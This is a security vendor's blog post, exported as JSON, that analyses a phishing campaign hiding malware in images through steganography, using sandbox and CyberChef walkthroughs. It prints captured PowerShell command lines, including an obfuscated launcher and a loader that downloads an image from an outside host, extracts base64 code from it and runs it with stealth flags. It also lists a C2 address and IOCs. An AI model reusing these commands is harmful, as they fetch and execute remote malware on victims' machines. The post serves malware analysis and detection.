{"id":6047,"date":"2023-10-24T05:34:04","date_gmt":"2023-10-24T05:34:04","guid":{"rendered":"\/cybersecurity-blog\/?p=6047"},"modified":"2023-12-01T07:48:11","modified_gmt":"2023-12-01T07:48:11","slug":"steganography-in-malware-attacks","status":"publish","type":"post","link":"https:\/\/any.run\/cybersecurity-blog\/steganography-in-malware-attacks\/","title":{"rendered":"Unpacking the Use of Steganography in Recent Malware Attacks"},"content":{"rendered":"\n<p><strong>UPD:<\/strong> The section &#8220;Additional tasks&#8221; has been updated to include a new November 2023 steganography campaign.<\/p>\n\n\n\n<p>Malware delivery techniques are always evolving to bypass security measures. Gone are the days when a scammer could simply send an executable file as an email attachment \u2014 today, it simply won&#8217;t get past email filters.\u00a0<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Threat actors are experimenting with evasion techniques&nbsp;<\/h2>\n\n\n\n<p>To evade detection by automatic analysis tools, attackers are adding layers of complexity. We&#8217;ve seen passwords on archives, captchas, and even QR codes integrated into recent attacks \u2014 we covered them in detail in a <a href=\"https:\/\/any.run\/cybersecurity-blog\/new-phishing-tactics\/\" target=\"_blank\" rel=\"noreferrer noopener\">previous article<\/a>.&nbsp;<\/p>\n\n\n\n<p>Attackers also vary the types of files they use as attachments. They opt for <strong>lnk<\/strong> files, <strong>img <\/strong>or <strong>iso <\/strong>image files, among others, to deceive security systems. 
Multiple techniques are often used in conjunction to increase the chances of a successful breach.&nbsp;<\/p>\n\n\n\n<p>Today, we want to highlight a resurgence in the use of steganography, a method that embeds malicious code within a benign file or image.&nbsp;&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">What is steganography?&nbsp;<\/h2>\n\n\n\n<p>Steganography hides data within another file or medium, effectively making it invisible. Unlike encryption, which scrambles data but clearly marks it as confidential, steganography camouflages the data, blending it in with its surroundings.&nbsp;<\/p>\n\n\n\n<p>This can be used to evade security defenses. Malicious code may be embedded in image files or even network traffic, aiming to make it indistinguishable from regular, benign data. This way, the hidden malware is less likely to trigger security alerts.&nbsp;&nbsp;<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Steganography is gaining traction<\/h3>\n\n\n\n<p>Steganography has been around for a while, but it hasn&#8217;t been a go-to method for attackers. The main reason is that simpler payload delivery techniques have been effective enough. 
However, we&#8217;ve recently noticed an uptick in the use of steganography in cyber attacks.&nbsp;<\/p>\n\n\n\n<p>To better understand how this technique is being deployed, let&#8217;s walk through an example and demonstrate how to detect hidden data using <a href=\"https:\/\/any.run\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=stegomalware&amp;utm_content=landing&amp;utm_term=241023\" target=\"_blank\" rel=\"noreferrer noopener\">ANY.RUN<\/a>.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"525\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/phishing-1024x525.png\" alt=\"\" class=\"wp-image-6049\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/phishing-1024x525.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/phishing-300x154.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/phishing-768x394.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/phishing-370x190.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/phishing-270x139.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/phishing-585x300.png 585w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/phishing-740x380.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/phishing.png 1370w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\">A breakdown of how this phishing campaign usually works<\/figcaption><\/figure><\/div>\n\n\n<h2 class=\"wp-block-heading\">Breaking down a steganography campaign&nbsp;<\/h2>\n\n\n\n<p>We&#8217;ll use <a href=\"https:\/\/app.any.run\/tasks\/9deec296-da80-4742-b491-0cce95066735\/?utm_source=anyrunblog&amp;utm_medium=article_bottom&amp;utm_campaign=stegomalware&amp;utm_content=task&amp;utm_term=241023\" target=\"_blank\" rel=\"noreferrer noopener\">this task<\/a> in ANY.RUN to walk through how this campaign operates. Keep in mind that attack strategies in this campaign can vary. At each stage of the attack chain, we&#8217;ll point out where the tactics might deviate from our example.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Initial infection vector<\/h3>\n\n\n\n<p>In the initial stage, we encounter various phishing tactics that employ different types of bait. 
Usually, the user gets a phishing email that either has an attachment containing a malicious document or a link to download a payload. These tactics align with <strong>MITRE ATT&amp;CK techniques Spearphishing Attachment (T1566.001)<\/strong> or <strong>Spearphishing Link (T1566.002)<\/strong>.&nbsp;<\/p>\n\n\n\n<p>In our specific example, the phishing email poses as a Colombian government organization. Take note of the archive password &#8220;0410&#8221; mentioned in the email \u2014 it will come into play later.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"651\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/email-1024x651.png\" alt=\"\" class=\"wp-image-6050\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/email-1024x651.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/email-300x191.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/email-768x488.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/email-370x235.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/email-270x172.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/email-740x470.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/email.png 1223w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\">This email was the initial delivery method in our task<\/figcaption><\/figure><\/div>\n\n\n<h3 class=\"wp-block-heading\">Payload delivery&nbsp;<\/h3>\n\n\n\n<p>The next step varies based on the initial attack vector. If it&#8217;s a malicious attachment, the exploit <strong>CVE-2017-11882 <\/strong>is leveraged to download the payload. 
If it&#8217;s a link, the user downloads an archive containing malicious content and executes it, triggering the payload download. This maps to <strong>MITRE ATT&amp;CK technique Exploitation for Client Execution (T1203)<\/strong>.&nbsp;<\/p>\n\n\n\n<p>In our example, clicking the link in the email redirects to ydray[.]com, where an archive is downloaded. To open it, we use the password &#8220;0410&#8221; provided in the email. Inside, we find a VBS file with a long, deceptive file name. When a malicious document is used, the VBS file is downloaded and executed automatically through the <strong>CVE-2017-11882 <\/strong>exploit, requiring the user only to open the Microsoft Office file.&nbsp;<\/p>\n\n\n\n<p>The VBS script is responsible for fetching the next stage of the attack. It is executed using wscript, aligning with the <strong>MITRE ATT&amp;CK technique Command and Scripting Interpreter: Visual Basic (T1059.005)<\/strong>.&nbsp;<\/p>\n\n\n\n<p>In addition, the VBS script is heavily obfuscated \u2014 and it is bloated to around 350-400 KB with junk data to make analysis challenging.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"622\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/static-1-1024x622.png\" alt=\"\" class=\"wp-image-6051\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/static-1-1024x622.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/static-1-300x182.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/static-1-768x467.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/static-1-370x225.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/static-1-270x164.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/static-1-740x450.png 740w, 
https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/static-1.png 1043w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\">Content of the VBS file<\/figcaption><\/figure><\/div>\n\n\n<h2 class=\"wp-block-heading\">Deobfuscating the VBS file&nbsp;<\/h2>\n\n\n\n<p>Deobfuscating the VBS script manually would be time-consuming, but that&#8217;s where an interactive sandbox like ANY.RUN comes in handy. We&#8217;ll execute the script and observe its behavior through dynamic analysis.<\/p>\n\n\n\n<p>To simplify the task, we&#8217;ll focus on the command line of its child PowerShell process. 
Specifically, we&#8217;ll examine the process with PID 3540. Here&#8217;s a snippet of what we see in the task:<\/p>\n\n\n\n<div class=\"wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper\n\"\n    >\n        <table id=\"wpdtSimpleTable-33\"\n           style=\"border-collapse:collapse;\n                   border-spacing:0px;\"\n           class=\"wpdtSimpleTable wpDataTable\"\n           data-column=\"1\"\n           data-rows=\"1\"\n           data-wpID=\"33\"\n           data-responsive=\"0\"\n           data-has-header=\"1\">\n\n                    <thead>        <tr class=\"wpdt-cell-row \" >\n                                <th class=\"wpdt-cell wpdt-align-left\"\n                                            data-cell-id=\"A1\"\n                    data-col-index=\"0\"\n                    data-row-index=\"0\"\n                    style=\" width:100%;                    padding:10px;\n                    \"\n                    >\n                                        \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -command \"$Codigo = 'JDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVQByDgTreGwDgTreIDgTreDgTre9DgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBw\/....cut a lot  here \u2026.\/eDgTregDgTreCcDgTreMQDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreQwDgTre6DgTreFwDgTreVwBpDgTreG4DgTreZDgTreBvDgTreHcDgTrecwBcDgTreFQDgTreZQBtDgTreHDgTreDgTreXDgTreDgTrenDgTreCwDgTreIDgTreDgTrenDgTreEkDgTreZwBmDgTreHgDgTreJwDgTrepDgTreCkDgTre'\";$OWjuxd = [system.Text.encoding]::Unicode.GetString(\"[system.Convert]::Frombase64string( $codigo.replace('DgTre','A') ))\";powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD\"\"                    <\/th>\n                                        <\/tr>\n                <\/tbody>    <\/table>\n<\/div><style id='wpdt-custom-style-33'>\ntable#wpdtSimpleTable-33{ table-layout: fixed !important; }\ntable#wpdtSimpleTable-33 td, 
table.wpdtSimpleTable33 th { white-space: normal !important; }\n<\/style>\n\n\n\n\n<p>At this point, the situation becomes pretty clear. The PowerShell command includes obfuscation and flags for stealthy execution, indicating malicious intent. While you could decode the observed actions using a tool like <a href=\"https:\/\/gchq.github.io\/CyberChef\/#recipe=Find_\/_Replace(%7B'option':'Simple%20string','string':'DgTre'%7D,'A',true,false,true,false)From_Base64('A-Za-z0-9%2B\/%3D',true,false)Decode_text('UTF-16LE%20(1200)')\" target=\"_blank\" rel=\"noreferrer noopener\">CyberChef<\/a>, the red flags are strong enough to suggest it&#8217;s easier just to move on to the next process in the chain. Let&#8217;s examine the command line of the subsequent process with PID 4060.<\/p>\n\n\n\n<div class=\"wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper\n\"\n    >\n        <table id=\"wpdtSimpleTable-34\"\n           style=\"border-collapse:collapse;\n                   border-spacing:0px;\"\n           class=\"wpdtSimpleTable wpDataTable\"\n           data-column=\"1\"\n           data-rows=\"1\"\n           data-wpID=\"34\"\n           data-responsive=\"0\"\n           data-has-header=\"1\">\n\n                    <thead>        <tr class=\"wpdt-cell-row \" >\n                                <th class=\"wpdt-cell wpdt-align-left\"\n                                            data-cell-id=\"A1\"\n                    data-col-index=\"0\"\n                    data-row-index=\"0\"\n                    style=\" width:100%;                    padding:10px;\n                    \"\n                    >\n                                        \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -windowstyle hidden -executionpolicy bypass -NoProfile -command \"$imageUrl = 'https:\/\/uploaddeimagens.com.br\/images\/004\/616\/609\/original\/rump_vbs.jpg?1695408937';$webClient = New-Object System.Net.WebClient;$imageBytes = 
$webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('0\/4i1mo\/d\/ee.etsap\/\/:sptth' , '' , '2' , 'Igfx' , '1' , 'C:\\Windows\\Temp\\', 'Igfx'))\"                    <\/th>\n                                        <\/tr>\n                <\/tbody>    <\/table>\n<\/div><style id='wpdt-custom-style-34'>\ntable#wpdtSimpleTable-34{ table-layout: fixed !important; }\ntable#wpdtSimpleTable-34 td, table.wpdtSimpleTable34 th { white-space: normal !important; }\n<\/style>\n\n\n\n\n<p>From the cmd output, it&#8217;s evident that PowerShell downloads a file from the uploaddeimagens resource. It then extracts information between the &lt;&lt;BASE64_START&gt;&gt; and &lt;&lt;BASE64_END&gt;&gt; flags. Additionally, an Igfx.lnk file is created and placed in the startup directory. The command line of this file reveals that upon OS reboot, a PowerShell process will execute the Igfx.vbs file from the Temp directory, running it in a hidden window. 
This gives us key insights into the malware&#8217;s persistence mechanism.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"621\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/static2-1024x621.png\" alt=\"\" class=\"wp-image-6052\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/static2-1024x621.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/static2-300x182.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/static2-768x466.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/static2-370x224.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/static2-270x164.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/static2-740x449.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/static2.png 1044w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\">Igfx.lnk as seen with ANY.RUN\u2019s Static discovering<\/figcaption><\/figure><\/div>\n\n\n<p>Following this, the extracted information is decoded from base64. An assembly is then loaded from the converted byte array and executed.&nbsp;<\/p>\n\n\n\n<p>Turning our attention to the image file, a static analysis initially reveals what appears to be a legitimate image. However, upon inspecting the HEX tab and scrolling down, we find the &lt;&lt;BASE64_START&gt;&gt; flag, previously seen in the PowerShell cmd. Right after this flag, we see the text &#8220;TVq,&#8221; which is the base64 encoding of the MZ signature that begins executable files. 
This confirms the use of steganography to hide malicious code within the image.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"726\" height=\"385\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/binary.png\" alt=\"\" class=\"wp-image-6053\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/binary.png 726w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/binary-300x159.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/binary-370x196.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/binary-270x143.png 270w\" sizes=\"(max-width: 726px) 100vw, 726px\" \/><figcaption class=\"wp-element-caption\">&lt;&lt;BASE64_START&gt;&gt; flag hidden in the image<\/figcaption><\/figure><\/div>\n\n\n<h2 class=\"wp-block-heading\">Extracting the payload in CyberChef<\/h2>\n\n\n\n<p>The script from the VBS file we\u2019ve looked at above triggers PowerShell to download an image file. This image contains a base64 encoded executable, aligning with MITRE ATT&amp;CK technique Obfuscated Files or Information: <strong>Command Obfuscation (T1027.010)<\/strong>. PowerShell then extracts and executes the hidden executable, fulfilling the criteria for Obfuscated Files or Information: <strong>Steganography (T1027.003)<\/strong>.&nbsp;<\/p>\n\n\n\n<p>To make payload extraction easier, we&#8217;ve created a universal recipe in CyberChef. This allows you to extract and decode hidden payloads from images efficiently. Here&#8217;s how:&nbsp;<\/p>\n\n\n\n<p>1. 
While still in ANY.RUN, download the image by clicking on the <strong>Download <\/strong>button.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"623\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/image-11-1024x623.png\" alt=\"\" class=\"wp-image-6054\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/image-11-1024x623.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/image-11-300x183.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/image-11-768x467.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/image-11-1536x935.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/image-11-2048x1246.png 2048w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/image-11-370x225.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/image-11-270x164.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/image-11-740x450.png 740w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\">You can easily download the image from ANY.RUN<\/figcaption><\/figure><\/div>\n\n\n<p>2. Follow the link to the recipe in <a href=\"https:\/\/gchq.github.io\/CyberChef\/#recipe=Unzip('infected',false)Find_\/_Replace(%7B'option':'Regex','string':'%5E.%2B%3C%3CBASE64_START%3E%3E'%7D,'',true,false,true,true)Find_\/_Replace(%7B'option':'Regex','string':'%3C%3CBASE64_END%3E%3E$'%7D,'',true,true,true,false)From_Base64('A-Za-z0-9%2B\/%3D',false,false)\" target=\"_blank\" rel=\"noreferrer noopener\">CyberChef<\/a>.&nbsp;&nbsp;<\/p>\n\n\n\n<p>3. 
Upload the file you downloaded in step 1 to CyberChef.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"397\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/upload-1024x397.png\" alt=\"\" class=\"wp-image-6056\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/upload-1024x397.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/upload-300x116.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/upload-768x298.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/upload-370x144.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/upload-270x105.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/upload-740x287.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/upload.png 1100w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\">Uploading the file to CyberChef<\/figcaption><\/figure><\/div>\n\n\n<p>4. 
Grab the payload that you&#8217;ve extracted from the image.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"384\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/save-1024x384.png\" alt=\"\" class=\"wp-image-6055\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/save-1024x384.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/save-300x112.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/save-768x288.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/save-370x139.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/save-270x101.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/save-740x277.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/10\/save.png 1100w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\">Saving the extracted payload to a disk<\/figcaption><\/figure><\/div>\n\n\n<p>In the final stage, the malicious code is executed via proxy through Regasm. 
Among the tasks we&#8217;ve analyzed, we&#8217;ve encountered various payloads like AgentTesla, AsyncRAT, NjRAT, Dtloader, and Remcos.<\/p>\n\n\n\n<p>As of the end of October 2023, the campaign is ongoing.&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Additional tasks &nbsp;<\/h2>\n\n\n\n<p>If you\u2019d like to review more tasks where adversaries deployed&nbsp;steganography, check out these samples in ANY.RUN:&nbsp;&nbsp;<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>First half of October 2023<\/strong><\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a href=\"https:\/\/app.any.run\/tasks\/6bf2be3f-aaba-466d-8b76-59af0bcd97ba\/?utm_source=anyrunblog&amp;utm_medium=article_bottom&amp;utm_campaign=stegomalware&amp;utm_content=task&amp;utm_term=241023\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/app.any.run\/tasks\/6bf2be3f-aaba-466d-8b76-59af0bcd97ba\/<\/a><\/li>\n\n\n\n<li><a href=\"https:\/\/app.any.run\/tasks\/de094198-967c-40d4-8b70-30b5fb7bfd43\/?utm_source=anyrunblog&amp;utm_medium=article_bottom&amp;utm_campaign=stegomalware&amp;utm_content=task&amp;utm_term=241023\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/app.any.run\/tasks\/de094198-967c-40d4-8b70-30b5fb7bfd43\/<\/a>&nbsp;<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>Second half of October 2023 <\/strong>&nbsp;<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a href=\"https:\/\/app.any.run\/tasks\/4eeb5f1a-9e68-4f93-a639-342cc29654ea\/?utm_source=anyrunblog&amp;utm_medium=article_bottom&amp;utm_campaign=stegomalware&amp;utm_content=task&amp;utm_term=241023\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/app.any.run\/tasks\/4eeb5f1a-9e68-4f93-a639-342cc29654ea\/<\/a><\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>November 2023<\/strong><\/h3>\n\n\n\n<p>We\u2019ve spotted the use of steganography in a new campaign.&nbsp;&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a 
href=\"https:\/\/app.any.run\/tasks\/98c0082f-3a84-4557-9b3d-36a68790a872\/\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/app.any.run\/tasks\/98c0082f-3a84-4557-9b3d-36a68790a872\/<\/a><\/li>\n<\/ul>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"800\" height=\"785\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2023\/12\/picturestego.png\" alt=\"\" class=\"wp-image-6397\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/12\/picturestego.png 800w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/12\/picturestego-300x294.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/12\/picturestego-768x754.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/12\/picturestego-70x70.png 70w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/12\/picturestego-370x363.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/12\/picturestego-270x265.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/12\/picturestego-740x726.png 740w\" sizes=\"(max-width: 800px) 100vw, 800px\" \/><\/figure><\/div>\n\n\n<p>Steganography is used in multiple stages:&nbsp;<\/p>\n\n\n\n<ol class=\"wp-block-list\" start=\"1\">\n<li>The modified &#8220;Google Update&#8221; app downloads multiple PE files and an image containing a DLL&nbsp;<\/li>\n<\/ol>\n\n\n\n<ol class=\"wp-block-list\" start=\"2\">\n<li>TrueUpdate, downloaded in the previous step, extracts and decrypts the DLL from the image file with 256 bytes XOR key and transfers control to the received DLL&nbsp;<\/li>\n<\/ol>\n\n\n\n<ol class=\"wp-block-list\" start=\"3\">\n<li>Then a malicious module comes into play, hosting a Remote Access Trojan and intercepting control. 
The activity of #gh0strat then becomes evident on the network at the address 112.213.101.146:7700&nbsp;<\/li>\n<\/ol>\n\n\n\n<h2 class=\"wp-block-heading\">Wrapping up&nbsp;<\/h2>\n\n\n\n<p>Steganography, once seen as too complex for regular deployment, is possibly being revived as a widespread malware delivery mechanism. It&#8217;s not just tricky to implement \u2014 it&#8217;s also difficult to detect.&nbsp;<\/p>\n\n\n\n<p>But as the analysis above showed, using dynamic analysis in ANY.RUN, along with <a href=\"https:\/\/any.run\/cybersecurity-blog\/static-discovery-update\/\" target=\"_blank\" rel=\"noreferrer noopener\">Static discovering<\/a> and CyberChef for payload extraction, can significantly reduce the manual work required for incident analysis or investigation.&nbsp;<\/p>\n\n\n\n<p><strong>Are you interested in trying the full range of ANY.RUN capabilities?<\/strong> Request a trial today and enjoy 14 days of free access to our Enterprise plan.&nbsp;<\/p>\n\n\n\n<p><a href=\"https:\/\/any.run\/demo\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=stegomalware&amp;utm_content=demo&amp;utm_term=241023\" target=\"_blank\" rel=\"noreferrer noopener\">Request trial \u2192<\/a><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Appendices&nbsp;<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">Appendix 1: IOC&nbsp;<\/h3>\n\n\n\n<p>Analyzed file:<\/p>\n\n\n\n<div class=\"wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper\n\"\n    >\n        <table id=\"wpdtSimpleTable-35\"\n           style=\"border-collapse:collapse;\n                   border-spacing:0px;\"\n           class=\"wpdtSimpleTable wpDataTable\"\n           data-column=\"2\"\n           data-rows=\"5\"\n           data-wpID=\"35\"\n           data-responsive=\"0\"\n           data-has-header=\"1\">\n\n                    <thead>        <tr class=\"wpdt-cell-row \" >\n                                <th 
class=\"wpdt-cell wpdt-align-left\"\n                                            data-cell-id=\"A1\"\n                    data-col-index=\"0\"\n                    data-row-index=\"0\"\n                    style=\" width:50%;                    padding:10px;\n                    \"\n                    >\n                                        Name\u00a0                    <\/th>\n                                                <th class=\"wpdt-cell wpdt-align-left\"\n                                            data-cell-id=\"B1\"\n                    data-col-index=\"1\"\n                    data-row-index=\"0\"\n                    style=\" width:50%;                    padding:10px;\n                    \"\n                    >\n                                        9deec296-da80-4742-b491-0cce95066735\u00a0                    <\/th>\n                                        <\/tr>\n                    <tbody>        <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-align-left\"\n                                            data-cell-id=\"A2\"\n                    data-col-index=\"0\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        MD5\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left\"\n                                            data-cell-id=\"B2\"\n                    data-col-index=\"1\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        90F7A60FF7DBEE279B77F1CD12852AB5\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell 
